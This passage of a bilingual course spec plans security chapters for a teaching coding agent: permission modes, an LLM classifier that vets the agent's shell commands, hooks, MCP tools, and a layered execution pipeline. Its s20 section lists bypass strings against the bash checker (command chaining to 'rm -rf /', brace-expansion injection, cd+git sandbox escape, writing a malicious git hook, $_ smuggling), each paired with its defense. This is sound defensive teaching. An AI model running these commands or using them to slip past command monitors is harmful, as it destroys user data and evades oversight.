agents/mock_mcp_server.py" + } + } +} +``` + +#### 工具集 (新增 2 个) + +```python +{ + "name": "mcp_list_servers", + "description": "List connected MCP servers and their tools.", + "input_schema": {"type": "object", "properties": {}} +} + +{ + "name": "mcp_discover", + "description": "Re-scan and register MCP tools from all connected servers.", + "input_schema": {"type": "object", "properties": {}} +} +``` + +#### Try It 实验内容 + +``` +1. "how many MCP servers are connected?" → mcp_list_servers +2. "rediscover tools from MCP servers" → mcp_discover +3. "count lines in s02_tool_use.py" → MCP count_lines 工具 +4. "search for 'PermissionGuard' in all files" → MCP search_content 工具 +``` + +--- + +### 【模块 E】s17: Secure Extension Harness (安全扩展总成) + +**文件**: `agents/s17_secure_extension_harness.py` +**预计行数**: ~450 行 +**依赖**: s13, s14, s15, s16 + +#### 文件头部模板 + +```python +#!/usr/bin/env python3 +# Harness: secure extension -- four lines of defense, one loop. +""" +s17_secure_extension_harness.py - Secure Extension Harness + +s13-s16 each run independently. Real systems need all layers +working together. The key is a clear execution pipeline where +each layer has one job. + + LLM calls tool + | + v + [1] Hook: PreToolUse ──block──> return error + | + v + [2] Classifier ──deny───> return error + | + v + [3] Permission ──deny───> return error + | ──ask───> user confirm? + | + v + [4] Execute (built-in or MCP) + | + v + [5] Hook: PostToolUse (observe/log) + | + v + return result + +Key insight: "生产级 Harness 的核心不是功能多,而是各层职责清晰、互不干扰。" +""" +``` + +#### 核心执行管线 + +```python +def execute_tool(tool_name: str, tool_input: dict, context: dict) -> str: + # Layer 1: Pre-tool hook + hook_ctx = {"tool": tool_name, "input": tool_input} + pre = HOOKS.fire("PreToolUse", hook_ctx) + if pre and pre.get("action") == "block": + return f"Blocked by hook: {pre['reason']}" + + # Layer 2: Security classification (bash only) + if tool_name == "bash": + cmd = tool_input.get("command", "") + classification = CLASSIFIER.classify(cmd, context.get("recent_text", "")) + if classification["mode"] == "deny": + return f"Security denied: {classification['reason']}" + if classification["mode"] == "ask": + approved = input( + f"\033[31m[security:{classification['level']}] " + f"Allow: {cmd}? (y/n) \033[0m" + ).strip().lower() == "y" + if not approved: + return "User denied command" + + # Layer 3: Execute (built-in handler or MCP) + handler = TOOL_HANDLERS.get(tool_name) + if handler: + output = handler(**tool_input) + elif tool_name in MCP_MANAGER._tools: + output = MCP_MANAGER.call(tool_name, tool_input) + else: + output = f"Unknown tool: {tool_name}" + + # Layer 4: Post-tool hook + HOOKS.fire("PostToolUse", {"tool": tool_name, "output": output}) + + return output +``` + +#### REPL 命令 + +```python +REPL_COMMANDS = { + "/security": lambda: print(f"Classifier: active\nMode: default\nDeny rules: {len(DANGEROUS_PATTERNS)}"), + "/hooks": lambda: print(HOOKS.list_hooks()), + "/mcp": lambda: print(MCP_MANAGER.list_servers()), + "/audit": lambda: print((WORKDIR / ".hooks" / "audit.jsonl").read_text()[-2000:]), +} +``` + +#### 工具集汇总 + +| 工具 | 来源 | 类型 | +|------|------|------| +| bash | 内建 | 经过安全管线的命令执行 | +| read_file | 内建 | 读文件 | +| write_file | 内建 | 写文件 | +| edit_file | 内建 | 编辑文件 | +| hook_register | s15 | 注册 Hook | +| hook_list | s15 | 列出 Hook | +| mcp_list_servers | s16 | 列出 MCP 服务器 | +| mcp_discover | s16 | 发现 MCP 工具 | +| (动态) | MCP | 外部工具 | + +#### Try It 实验内容 + +``` +1. "list all python files" → all layers pass -> allow +2. "run rm -rf /" → classifier deny -> blocked +3. "write a test file and show audit log" → PostToolUse hook logs -> /audit 查看 +4. "search for 'PermissionGuard' via MCP" → MCP tool called through pipeline +5. "register a hook that blocks all pip commands" → dynamic hook registration +``` + +--- + +## 五、前端更新 + +### 【模块 F】constants.ts 更新 + +**文件**: `web/src/lib/constants.ts` + +```typescript +// 1. VERSION_ORDER 新增 s13-s17 +export const VERSION_ORDER = [ + "s01", "s02", "s03", "s04", "s05", "s06", "s07", "s08", + "s09", "s10", "s11", "s12", + "s13", "s14", "s15", "s16", "s17" // 新增 +] as const; + +// 2. VERSION_META 新增 5 个条目 +export const VERSION_META: Record = { + // ... 现有 s01-s12 ... + s13: { + title: "Permission Guard", + subtitle: "Not Every Command Should Run Automatically", + coreAddition: "PermissionGuard with 5 permission modes", + keyInsight: "把 '禁止' 升级为 '策略' -- 从一条 if 到一个权限模型", + layer: "security", + prevVersion: "s02", + }, + s14: { + title: "Security Classifier", + subtitle: "Let the Model Judge Its Own Commands", + coreAddition: "Two-layer classifier: regex quick-scan + LLM classification", + keyInsight: "正则表达式只认模式不认意图;LLM 能理解上下文,判断命令真正的危险程度", + layer: "security", + prevVersion: "s13", + }, + s15: { + title: "Hooks System", + subtitle: "Intercept Between Model and Tool", + coreAddition: "HookManager with 8 event types and 3 execution modes", + keyInsight: "Hooks 不改变工具的行为,但改变了工具何时、如何、是否被执行", + layer: "security", + prevVersion: "s13", + }, + s16: { + title: "MCP Client", + subtitle: "Tools Don't Have to Be Built-in", + coreAddition: "MCPClient + MCPManager for external tool servers", + keyInsight: "MCP 把工具分发从 dict 升级为网络协议", + layer: "security", + prevVersion: "s02", + }, + s17: { + title: "Secure Extension Harness", + subtitle: "Four Lines of Defense, One Loop", + coreAddition: "Unified execution pipeline: Hook -> Classify -> Permission -> Execute", + keyInsight: "生产级 Harness 的核心不是功能多,而是各层职责清晰、互不干扰", + layer: "security", + prevVersion: "s16", + }, +}; + +// 3. LAYERS 新增 security 层 +export const LAYERS = [ + { id: "tools" as const, label: "Tools & Execution", color: "#3B82F6", versions: ["s01", "s02"] }, + { id: "planning" as const, label: "Planning & Coordination", color: "#10B981", versions: ["s03", "s04", "s05", "s07"] }, + { id: "memory" as const, label: "Memory Management", color: "#8B5CF6", versions: ["s06"] }, + { id: "concurrency" as const, label: "Concurrency", color: "#F59E0B", versions: ["s08"] }, + { id: "collaboration" as const, label: "Collaboration", color: "#EF4444", versions: ["s09", "s10", "s11", "s12"] }, + // 新增 + { id: "security" as const, label: "Security & Extensibility", color: "#06B6D4", versions: ["s13", "s14", "s15", "s16", "s17"] }, +] as const; +``` + +### 【模块 F】国际化文件更新 + +**文件**: `web/src/i18n/messages/zh.json` + +在 `sessions` 和 `viz` 中新增: + +```json +{ + "sessions": { + "s13": "权限守卫", + "s14": "安全分类器", + "s15": "Hooks 事件系统", + "s16": "MCP 客户端", + "s17": "安全扩展总成" + }, + "layer_labels": { + "security": "安全与扩展" + }, + "layers": { + "security": "保护用户免受模型的伤害。权限模型、安全分类、生命周期 Hook 和外部工具协议。" + }, + "viz": { + "s13": "Permission Guard Pipeline", + "s14": "Two-Layer Security Classifier", + "s15": "Hook Manager Event Bus", + "s16": "MCP Tool Discovery", + "s17": "Secure Execution Pipeline" + } +} +``` + +**文件**: `web/src/i18n/messages/en.json` + +```json +{ + "sessions": { + "s13": "Permission Guard", + "s14": "Security Classifier", + "s15": "Hooks System", + "s16": "MCP Client", + "s17": "Secure Extension Harness" + }, + "layer_labels": { + "security": "Security & Extensibility" + }, + "layers": { + "security": "Protect the user from the agent. Permission models, security classifiers, lifecycle hooks, and external tool protocols." + }, + "viz": { + "s13": "Permission Guard Pipeline", + "s14": "Two-Layer Security Classifier", + "s15": "Hook Manager Event Bus", + "s16": "MCP Tool Discovery", + "s17": "Secure Execution Pipeline" + } +} +``` + +**文件**: `web/src/i18n/messages/ja.json` + +```json +{ + "sessions": { + "s13": "権限ガード", + "s14": "セキュリティ分類器", + "s15": "Hooks システム", + "s16": "MCP クライアント", + "s17": "セキュア拡張ハーネス" + }, + "layer_labels": { + "security": "セキュリティと拡張性" + }, + "viz": { + "s13": "Permission Guard Pipeline", + "s14": "Two-Layer Security Classifier", + "s15": "Hook Manager Event Bus", + "s16": "MCP Tool Discovery", + "s17": "Secure Execution Pipeline" + } +} +``` + +### 【模块 G】模拟器场景数据 + +需要为每个新章节创建模拟器场景文件。 + +**文件**: `web/src/data/scenarios/s13.json` + +```json +{ + "version": "s13", + "title": "Permission Guard", + "description": "An agent with a permission model that classifies commands before execution", + "steps": [ + { + "type": "user_message", + "content": "List all files and then delete temp.log", + "annotation": "User sends a multi-step task" + }, + { + "type": "assistant_text", + "content": "I'll list the files first, then delete temp.log.", + "annotation": "Model plans two tool calls" + }, + { + "type": "tool_call", + "content": "ls -la", + "toolName": "bash", + "annotation": "ls is in ALLOWED_COMMANDS -> auto-allow" + }, + { + "type": "tool_result", + "content": "temp.log hello.py README.md", + "toolName": "bash", + "annotation": "Allowed: ls is a safe command" + }, + { + "type": "tool_call", + "content": "rm temp.log", + "toolName": "bash", + "annotation": "rm matches ASK_PATTERNS -> permission check" + }, + { + "type": "permission_check", + "mode": "ask", + "reason": "File deletion", + "command": "rm temp.log", + "annotation": "PermissionGuard classifies as 'ask' mode" + }, + { + "type": "tool_result", + "content": "(file deleted)", + "toolName": "bash", + "annotation": "User approved the deletion" + }, + { + "type": "assistant_text", + "content": "Done! Listed files and deleted temp.log.", + "annotation": "Both operations completed with appropriate permission checks" + } + ] +} +``` + +**文件**: `web/src/data/scenarios/s14.json` + +```json +{ + "version": "s14", + "title": "Security Classifier", + "description": "Two-layer command classification: regex quick-scan + LLM intent analysis", + "steps": [ + { + "type": "user_message", + "content": "Clean up the build directory and then check git status", + "annotation": "User asks for potentially dangerous operations" + }, + { + "type": "assistant_text", + "content": "I'll remove the build directory and check git status.", + "annotation": "Model plans two operations" + }, + { + "type": "tool_call", + "content": "rm -rf build/", + "toolName": "bash", + "annotation": "Quick scan: no dangerous pattern match. LLM classify needed." + }, + { + "type": "classifier_check", + "layer1": "pass", + "layer2": "moderate", + "mode": "ask", + "annotation": "LLM classifies 'rm -rf build/' as moderate risk" + }, + { + "type": "tool_result", + "content": "(build directory removed)", + "toolName": "bash", + "annotation": "User approved after LLM classification" + }, + { + "type": "tool_call", + "content": "git status", + "toolName": "bash", + "annotation": "git is in SAFE_COMMANDS whitelist -> auto-allow" + }, + { + "type": "tool_result", + "content": "On branch main\nnothing to commit", + "toolName": "bash", + "annotation": "Whitelist: zero-cost classification" + }, + { + "type": "assistant_text", + "content": "Build directory cleaned and git status checked.", + "annotation": "Both operations completed with appropriate classification" + } + ] +} +``` + +**文件**: `web/src/data/scenarios/s15.json` + +```json +{ + "version": "s15", + "title": "Hooks System", + "description": "Lifecycle hooks that intercept, log, and modify tool calls", + "steps": [ + { + "type": "user_message", + "content": "Create a new file called config.yaml with default settings", + "annotation": "User requests file creation" + }, + { + "type": "hook_fire", + "event": "AgentStart", + "annotation": "AgentStart hook fires" + }, + { + "type": "assistant_text", + "content": "I'll create config.yaml with default settings.", + "annotation": "Model decides to use write_file" + }, + { + "type": "hook_fire", + "event": "PreToolUse", + "tool": "write_file", + "annotation": "PreToolUse hook fires (no block)" + }, + { + "type": "tool_call", + "content": "key: value\ndebug: false", + "toolName": "write_file", + "annotation": "write_file executes" + }, + { + "type": "hook_fire", + "event": "PostToolUse", + "hook": "auto_git_add", + "annotation": "PostToolUse hook auto-git-adds the file" + }, + { + "type": "tool_result", + "content": "Wrote 27 bytes to config.yaml", + "toolName": "write_file", + "annotation": "File written and auto-staged" + }, + { + "type": "assistant_text", + "content": "Done! config.yaml created and auto-staged in git.", + "annotation": "Hook side-effect mentioned" + } + ] +} +``` + +**文件**: `web/src/data/scenarios/s16.json` + +```json +{ + "version": "s16", + "title": "MCP Client", + "description": "Connecting to external tool servers via Model Context Protocol", + "steps": [ + { + "type": "user_message", + "content": "How many lines of code are in s02_tool_use.py?", + "annotation": "User asks a question that can use MCP tools" + }, + { + "type": "assistant_text", + "content": "I'll use the MCP file analyzer to count lines.", + "annotation": "Model chooses MCP tool over bash" + }, + { + "type": "tool_call", + "content": "agents/s02_tool_use.py", + "toolName": "count_lines", + "annotation": "MCP tool discovered at startup" + }, + { + "type": "tool_result", + "content": "151 lines", + "toolName": "count_lines", + "annotation": "MCP server processes the request via JSON-RPC" + }, + { + "type": "assistant_text", + "content": "s02_tool_use.py has 151 lines of code.", + "annotation": "MCP tool result returned seamlessly" + } + ] +} +``` + +**文件**: `web/src/data/scenarios/s17.json` + +```json +{ + "version": "s17", + "title": "Secure Extension Harness", + "description": "Full security pipeline: Hook → Classify → Permission → Execute → PostHook", + "steps": [ + { + "type": "user_message", + "content": "Check git log and then force push to origin", + "annotation": "User mixes safe and dangerous operations" + }, + { + "type": "assistant_text", + "content": "I'll check the git log first.", + "annotation": "Model starts with safe operation" + }, + { + "type": "hook_fire", + "event": "PreToolUse", + "tool": "bash", + "annotation": "[Layer 1] PreToolUse hook fires" + }, + { + "type": "tool_call", + "content": "git log --oneline -5", + "toolName": "bash", + "annotation": "[Layer 2] Classifier: whitelist -> allow" + }, + { + "type": "hook_fire", + "event": "PostToolUse", + "annotation": "[Layer 5] PostToolUse audit log" + }, + { + "type": "tool_result", + "content": "a1b2c3d Fix bug\n e4f5g6h Add feature", + "toolName": "bash", + "annotation": "Safe command passed all layers" + }, + { + "type": "assistant_text", + "content": "Now I'll force push to origin.", + "annotation": "Model attempts dangerous operation" + }, + { + "type": "hook_fire", + "event": "PreToolUse", + "tool": "bash", + "annotation": "[Layer 1] PreToolUse hook fires" + }, + { + "type": "classifier_check", + "layer1": "blocked", + "reason": "Force push pattern matched", + "mode": "deny", + "annotation": "[Layer 2] Quick scan catches force push -> deny" + }, + { + "type": "tool_result", + "content": "Security denied: Force push pattern blocked", + "toolName": "bash", + "annotation": "Blocked at Layer 2, never reaches execution" + }, + { + "type": "assistant_text", + "content": "I can't force push as it's blocked by security policy. Would you like me to push normally instead?", + "annotation": "Model acknowledges the security block" + } + ] +} +``` + +### 【模块 G】模拟器组件增强 + +模拟器需要支持新的 step 类型来可视化安全管线: + +**需修改的文件**: `web/src/hooks/useSimulator.ts` + +新增 step 类型支持: +- `permission_check` — 显示权限检查 UI (allow/ask/deny) +- `classifier_check` — 显示分类器结果 (layer1 pass/block, layer2 safe/moderate/dangerous) +- `hook_fire` — 显示 Hook 触发事件 + +**需修改的文件**: `web/src/components/simulator/AgentLoopSimulator.tsx` + +新增可视化元素: +- 权限检查阶段:黄色警告图标 + 命令预览 +- 分类器阶段:双列显示 (Layer 1 regex / Layer 2 LLM) +- Hook 触发:闪电图标 + 事件名 + +--- + +## 六、文档文件 + +### 【模块 H】课程文档 + +每章需要 3 个文档(英文/中文/日文),遵循现有模板结构: + +``` +docs/en/s13-permission-guard.md +docs/en/s14-security-classifier.md +docs/en/s15-hooks-system.md +docs/en/s16-mcp-client.md +docs/en/s17-secure-extension-harness.md + +docs/zh/s13-permission-guard.md +docs/zh/s14-security-classifier.md +docs/zh/s15-hooks-system.md +docs/zh/s16-mcp-client.md +docs/zh/s17-secure-extension-harness.md + +docs/ja/s13-permission-guard.md +docs/ja/s14-security-classifier.md +docs/ja/s15-hooks-system.md +docs/ja/s16-mcp-client.md +docs/ja/s17-secure-extension-harness.md +``` + +每篇文档模板: + +```markdown +# sXX: [标题] ([中文标题]) + +`s02 > [ s13 ] > s14 ... | s15 | s16 > s17` + +> *"[标语]"* -- [核心概念] +> +> **Harness 层**: [层次描述] + +## 问题 + +[当前痛点,2-3 段] + +## 解决方案 + +``` +[ASCII 图示] +``` + +## 工作原理 + +[逐步代码解释] + +## 相对 sYY 的变更 + +| 组件 | 之前 (sYY) | 之后 (sXX) | +|------|-----------|-----------| + +## 现实对照 (Reality Check) + +> 真实 Claude Code 中的对应实现: +> - [对应源码模块 1] +> - [对应源码模块 2] + +## Try It + +```sh +cd learn-claude-code +python agents/sXX_[name].py +``` + +实验 prompt: +1. [具体任务 1] +2. [具体任务 2] +3. [具体任务 3] +``` + +--- + +## 七、需更新的现有文件 + +### 【模块 I】现有文件更新 + +| 文件 | 修改内容 | +|------|---------| +| `agents/s_full.py` | 在 `# === SECTION: base_tools ===` 前增加 `# === SECTION: security ===`(SecurityClassifier + PermissionGuard + HookManager + MCPManager),修改 run_bash 使用安全管线。增加 REPL 命令 /security, /hooks, /mcp, /audit。预计增加 ~250 行 | +| `README.md` | 更新课程目录,增加 Phase 5 描述 | +| `README-zh.md` | 同上(中文版) | +| `s01-s12-topic-map.md` | 扩展为 s01-s17-topic-map.md | +| `web/src/lib/constants.ts` | 增加 s13-s17 的 VERSION_META 和 security layer | +| `web/src/i18n/messages/en.json` | 增加 sessions/layer_labels/viz 条目 | +| `web/src/i18n/messages/zh.json` | 同上(中文) | +| `web/src/i18n/messages/ja.json` | 同上(日文) | +| `web/src/hooks/useSimulator.ts` | 支持 permission_check / classifier_check / hook_fire step 类型 | +| `web/src/components/simulator/AgentLoopSimulator.tsx` | 新增安全管线可视化 UI | +| `web/scripts/extract-content.ts` | 确保 s13-s17 源码被正确提取 | + +--- + +## 八、分工建议 + +| 模块 | 标签 | 工作量 | 建议分工 | +|------|------|--------|---------| +| **A** | s13 Permission Guard | ~230 行 Python + 3 篇文档 | 开发者 1 | +| **B** | s14 Security Classifier | ~280 行 Python + 3 篇文档 | 开发者 1 | +| **C** | s15 Hooks System | ~300 行 Python + 3 篇文档 | 开发者 2 | +| **D** | s16 MCP Client | ~350 行 Python + 3 篇文档 | 开发者 2 | +| **E** | s17 Secure Extension Harness | ~450 行 Python + 3 篇文档 | 开发者 1+2 协作 | +| **F** | 前端 constants + i18n | ~100 行 TypeScript/JSON | 开发者 3 | +| **G** | 前端模拟器场景 + 组件 | ~300 行 TypeScript/JSON | 开发者 3 | +| **H** | 课程文档 (15 篇) | ~15 篇 Markdown | 开发者 4 / AI 辅助 | +| **I** | 现有文件更新 | ~400 行混合 | 开发者 3 或最后统一处理 | + +### 执行顺序 + +``` +Week 1: + A(s13) → B(s14) [开发者 1] + C(s15) [开发者 2] + F(前端基础设施) [开发者 3] + H(s13-s15 文档) [开发者 4] + +Week 2: + D(s16) [开发者 2] + E(s17) [开发者 1+2] + G(模拟器场景+组件) [开发者 3] + H(s16-s17 文档) [开发者 4] + +Week 3: + I(现有文件更新) [开发者 3] + 集成测试 + s_full.py [全员] +``` + +--- +--- + +# Phase 6: PRODUCTION PATTERNS — 开发规格文档 + +> **目标**: 新增 s18-s21 共 4 个章节,基于 claude-code 源码分析,深入生产级上下文管理、LLM 安全分类器、Bash 安全检查、Plugin 系统。 +> **分析依据**: 2026-04-30 对 `/Users/yanghaoran/Code/claude-code/src/` 的完整源码分析。 +> **前置条件**: Phase 5 (s13-s17) 完成。 + +--- + +## Phase 6 总体架构 + +### 新增章节依赖关系 + +``` +s06 (上下文压缩) + └── s18 (Session Memory) — 结构化记忆 + 自动提取 + +s14 (安全分类器) + └── s19 (Auto Mode 分类器) — 两阶段 LLM 分类 + +s13 (权限守卫) + └── s20 (Bash 安全深度) — 命令白名单 + Flag 验证 + +s05 (Skills) + └── s21 (Plugin 系统) — 可组合插件架构 +``` + +### 新增 Layer 定义 + +现有 6 层 → 新增第 7 层 `production`: + +| Layer ID | Label (EN) | Label (ZH) | Color | Versions | +|----------|-----------|-----------|-------|----------| +| tools | Tools & Execution | 工具与执行 | #3B82F6 | s01, s02 | +| planning | Planning & Coordination | 规划与协调 | #10B981 | s03, s04, s05, s07 | +| memory | Memory Management | 记忆管理 | #8B5CF6 | s06 | +| concurrency | Concurrency | 并发 | #F59E0B | s08 | +| collaboration | Collaboration | 协作 | #EF4444 | s09, s10, s11, s12 | +| security | Security & Extensibility | 安全与扩展 | #06B6D4 | s13, s14, s15, s16, s17 | +| **production** | **Production Patterns** | **生产模式** | **#EC4899 (pink)** | **s18, s19, s20, s21, s22, s23** | + +--- + +## Phase 6 教学内容概述 + +### 为什么需要 Phase 6? + +s13-s17 把教学 Agent 从"玩具"升级到了"安全可扩展"。但对比真实 Claude Code 源码,还有几个关键的生产级模式没有覆盖: + +1. **s06 的上下文压缩太简单** — 真实系统有结构化的 Session Memory(10 个 section 模板、token 预算管理、自动提取) +2. **s14 的 LLM 分类器太简单** — 真实系统有两阶段分类(Fast XML + Thinking),支持 PowerShell、transcript 重放、GrowthBook 特性开关 +3. **s13 的权限检查太简单** — 真实系统的 Bash 安全检查有 2000+ 行,包含命令白名单、Flag 级验证、Glob 检测、Git 内部路径保护 +4. **s05 的 Skills 太简单** — 真实系统有完整的 Plugin 架构(内置插件、Marketplace 插件、skills + hooks + MCP 三合一) + +Phase 6 要展示的是"从教学级到生产级"的工程差距,让学生理解真实系统的复杂性。 + +### s18: Session Memory — 会话记忆不是压缩,是结构化笔记 + +**一句话**: s06 教了"丢掉不重要的上下文",s18 教"把重要的上下文变成可检索的笔记"。 + +s06 的 compact 本质是"删减"——用 LLM 摘要替换原始对话,丢失细节。真实 Claude Code 的 Session Memory 是另一种思路:用 LLM 从对话中**提取**结构化笔记,持久化到磁盘,下次对话直接加载。 + +s18 引入 `SessionMemory` 系统: + +``` +对话进行中 (token 监控) + │ + ├─ 达到 10K tokens → 初始化 session-memory.md + │ + ├─ 每增长 5K tokens → 增量更新 + │ + └─ 对话结束 → 最终提取 + +session-memory.md 结构: +┌─────────────────────────────┐ +│ # Session Title │ ← 5-10 词描述 +│ # Current State │ ← 正在做什么 +│ # Task Specification │ ← 用户要求 +│ # Files and Functions │ ← 关键文件 +│ # Workflow │ ← 常用命令 +│ # Errors & Corrections │ ← 踩过的坑 +│ # Codebase Documentation │ ← 系统组件 +│ # Learnings │ ← 经验教训 +│ # Key Results │ ← 重要输出 +│ # Worklog │ ← 步骤日志 +└─────────────────────────────┘ +``` + +**Token 预算管理**: +- 每个 section 最多 2000 tokens +- 总计不超过 12000 tokens +- 超标时自动压缩(优先保留 Current State 和 Errors) + +**并发安全**: +- `inProgress` 锁防止并发提取 +- trailing extraction 模式:如果提取进行中又有新请求,记录最新上下文,等当前提取完成后再跑一次 + +**关键洞察**: 上下文管理的终极形态不是"压缩",而是"提取"。压缩是被动防御(防止超限),提取是主动积累(构建知识)。 + +**与真实源码的对照**: Claude Code 的 Session Memory 系统(`services/SessionMemory/`)包含: +- `sessionMemory.ts` — 主提取逻辑,forked agent 执行 +- `sessionMemoryUtils.ts` — Token 阈值配置、并发状态管理 +- `prompts.ts` — 10 section 模板、自定义 prompt 支持 +- `extractMemories.ts` — 自动记忆提取(独立于 Session Memory) +- 与 compact 联动:compact 后注入 Session Memory,实现"压缩不丢信息" + +--- + +### s19: Auto Mode Classifier — 两阶段 LLM 安全分类 + +**一句话**: s14 的单次 LLM 分类是 MVP,真实系统用两阶段分类实现精度和成本的平衡。 + +s14 的 LLM 分类器只用一次 LLM 调用,返回 safe/moderate/dangerous。这在教学场景足够,但生产环境有两个问题: +1. **精度不够** — 单次判断容易误判(`rm -rf node_modules/` vs `rm -rf /` 需要更多推理) +2. **成本浪费** — 所有命令都走 LLM,即使明显安全的也要花 token + +s19 引入**两阶段分类**: + +``` +命令进入 + │ + ▼ +[Stage 1: Fast XML 分类] + │ 快速判断,低成本 + │ XML 格式输出 + │ + ├─ safe → allow(确定性高,直接放行) + ├─ dangerous → deny(确定性高,直接拒绝) + │ + └─ uncertain → [Stage 2: Thinking 深度推理] + │ 带思维链的深度分析 + │ 考虑对话上下文 + │ 分析命令组合意图 + │ + └─ safe / moderate / dangerous +``` + +**安全兜底原则**: +- 任何阶段失败 → 默认 block(安全优先) +- 分类器不可用 → 默认 block +- 解析失败 → 默认 block +- Transcript 过长 → 默认 block + +**Transcript 传递**: +- 把当前对话历史(最近 N 轮)格式化为 JSONL +- 分类器能看到完整上下文,理解命令的"来龙去脉" + +**关键洞察**: 生产级 LLM 分类器的核心不是"更准",而是"安全兜底 + 成本优化"。Fast stage 处理 80% 的简单判断,Thinking stage 只处理 20% 的复杂情况。 + +**与真实源码的对照**: Claude Code 的 `yoloClassifier.ts`(`utils/permissions/`)实现了: +- `YoloClassifierTool` — 专用分类器工具定义 +- `buildYoloSystemPrompt` — 52KB 的安全分类 prompt +- 两阶段配置:`tengu_auto_mode_config` 中的 `twoStageClassifier`(both/fast/thinking) +- PowerShell 支持:专门的 `POWERSHELL_DENY_GUIDANCE` +- 完整遥测:`tengu_auto_mode_outcome` 追踪分类结果、token 开销、延迟 + +--- + +### s20: Bash Security Deep Dive — 2000 行安全检查拆解 + +**一句话**: s13 的正则匹配是入门,真实系统的 Bash 安全检查是一个完整的命令解析器。 + +s13 用正则表达式匹配危险模式(`rm -rf /`、`curl | sh`)。但这在真实场景中远远不够: + +- `ls; rm -rf /` — 分号拼接绕过 +- `git diff {@'{'0},--output=/tmp/pwned}` — brace expansion 注入 +- `cd /malicious && git status` — cd + git 沙箱逃逸 +- `uniq --skip-chars=0$_` — 变量展开走私 + +s20 引入**命令解析器级别的安全检查**: + +``` +命令字符串 + │ + ▼ +[Shell 解析] tryParseShellCommand() + │ 分词、处理引号、处理转义 + │ + ▼ +[Token 分析] + ├─ 命令白名单匹配 (COMMAND_ALLOWLIST) + ├─ Flag 级验证 (每个命令枚举合法 flag) + ├─ Glob 检测 (未引用的 *, ?, [...]) + ├─ 变量展开检测 (未引用的 $VAR) + ├─ Brace expansion 检测 ({a,b} 或 {1..5}) + │ + ▼ +[复合命令检查] + ├─ Git 内部路径保护 (HEAD, objects/, refs/, hooks/) + ├─ 沙箱逃逸检测 (cd + git 组合) + ├─ Bare repo 检测 + │ + ▼ +[路径验证] + └─ 写路径提取 + 沙箱白名单匹配 +``` + +**教学策略**:不实现完整的 2000 行检查器,而是用 5 个递进的攻击-防御案例展示思路: + +| 案例 | 攻击 | 防御 | +|------|------|------| +| 1 | `ls; rm -rf /` | 复合命令拆分 + 逐条检查 | +| 2 | `echo *` 扩展为危险参数 | Glob 检测 + 引号状态追踪 | +| 3 | `cd /tmp && git status` | cd + git 组合检测 | +| 4 | `mkdir hooks && echo malicious > hooks/pre-commit && git status` | Git 内部路径写检测 | +| 5 | `$_` 变量走私 | 变量展开检测(单引号内 literal,双引号内展开) | + +**关键洞察**: 安全检查的敌人不是"危险命令",而是"看起来无害但能被组合利用的命令"。一个好的安全检查器需要理解 Shell 的解析规则,而不仅仅是匹配字符串。 + +**与真实源码的对照**: Claude Code 的 Bash 安全系统分布在多个文件中: +- `tools/BashTool/bashSecurity.ts` — 23 种安全检查(命令替换、heredoc 注入、Zsh 危险命令等) +- `tools/BashTool/readOnlyValidation.ts` — 2000+ 行的只读命令验证,包含: + - `COMMAND_ALLOWLIST` — 40+ 命令的白名单 + Flag 级验证 + - `READONLY_COMMAND_REGEXES` — 正则回退 + - `containsUnquotedExpansion()` — Shell 引号状态机 + - `commandWritesToGitInternalPaths()` — Git 内部路径检测 + - `checkReadOnlyConstraints()` — 统一入口 +- `utils/permissions/bashClassifier.ts` — Bash 命令分类 +- `utils/powershell/dangerousCmdlets.ts` — PowerShell 7 类危险 cmdlet + +--- + +### s21: Plugin System — Skills、Hooks、MCP 的统一容器 + +**一句话**: s05 的 Skill 是单一知识单元,s21 的 Plugin 是包含 skills + hooks + MCP 的可组合容器。 + +s05 的 Skill 系统解决了"按需加载知识"的问题。但真实系统中,用户扩展不只是知识,还包括: +- **行为拦截**(Hooks) — 每次工具调用前/后执行自定义逻辑 +- **外部工具**(MCP) — 连接数据库、API、文件分析器 +- **知识注入**(Skills) — 领域专业知识 + +这三者经常需要一起使用。例如"数据库助手"插件需要: +- 一个 MCP 服务器(连接数据库) +- 几个 Skills(SQL 最佳实践、表结构文档) +- 几个 Hooks(查询前记录审计日志) + +s21 引入 `PluginManager`: + +``` +~/.claude/plugins/ + ├── db-assistant/ + │ ├── manifest.json ← 插件元数据 + │ ├── skills/ ← 知识文件 + │ ├── hooks/ ← Hook 配置 + │ └── mcp-servers/ ← MCP 服务器配置 + │ + └── code-reviewer/ + ├── manifest.json + └── skills/ + +manifest.json: +{ + "name": "db-assistant", + "version": "1.0.0", + "description": "Database query and analysis assistant", + "skills": ["sql-best-practices.md", "schema-reference.md"], + "hooks": { + "PreToolUse": "audit-log.py" + }, + "mcpServers": { + "db-query": { "transport": "stdio", "command": "python db_server.py" } + } +} +``` + +**与 Skill 的区别**: +| 维度 | Skill (s05) | Plugin (s21) | +|------|-------------|--------------| +| 内容 | 单一知识文件 | skills + hooks + MCP | +| 加载 | 按需 | 启动时 + 按需 | +| 管理 | 文件系统 | 注册表(enable/disable) | +| 隔离 | 共享命名空间 | 插件命名空间(`plugin:skill`) | + +**关键洞察**: Plugin 是"s05 + s15 + s16"的统一封装。它不是新的核心机制,而是现有机制的组合模式。这种"可组合"的设计让学生理解:好的架构不需要新概念,只需要好的组合方式。 + +**与真实源码的对照**: Claude Code 的 Plugin 系统(`plugins/`)包含: +- `builtinPlugins.ts` — 内置插件注册(`{name}@builtin` 命名) +- `PluginInstallationManager` — Marketplace 插件安装/卸载 +- `pluginOperations.ts` — 插件 CRUD 操作 +- `pluginOptionsStorage.ts` — 插件配置持久化 +- 每个 Plugin 可以提供 `skills`、`hooks`、`mcpServers` 三个维度 +- 用户通过 `/plugin` 命令启用/禁用 + +--- + +### Phase 6 课程总结 + +| 章节 | 核心问题 | 回答 | 新增机制 | 源码对照 | +|------|---------|------|---------|---------| +| **s18** | 怎么让压缩不丢信息? | 结构化记忆提取 | SessionMemory (10 section 模板 + token 预算) | `services/SessionMemory/` (4 文件) | +| **s19** | 怎么让 LLM 分类更准? | 两阶段分类 | FastXMLClassifier + ThinkingClassifier | `utils/permissions/yoloClassifier.ts` (52KB prompt) | +| **s20** | Bash 安全检查到底有多复杂? | 命令解析器级安全 | CommandParser + FlagValidator + GlobDetector | `tools/BashTool/readOnlyValidation.ts` (2000+ 行) | +| **s21** | 怎么统一管理扩展? | 可组合插件 | PluginManager + PluginManifest | `plugins/builtinPlugins.ts` + `services/plugins/` | +| **s22** | 怎么让知识跨会话持久? | 自动记忆提取 | MemoryExtractor (4 种类型 + MEMORY.md 索引) | `services/extractMemories/` + `memdir/` | +| **s23** | 怎么在文件系统层面隔离? | 沙箱写保护 | SandboxManager (路径白名单 + denyWrite) | 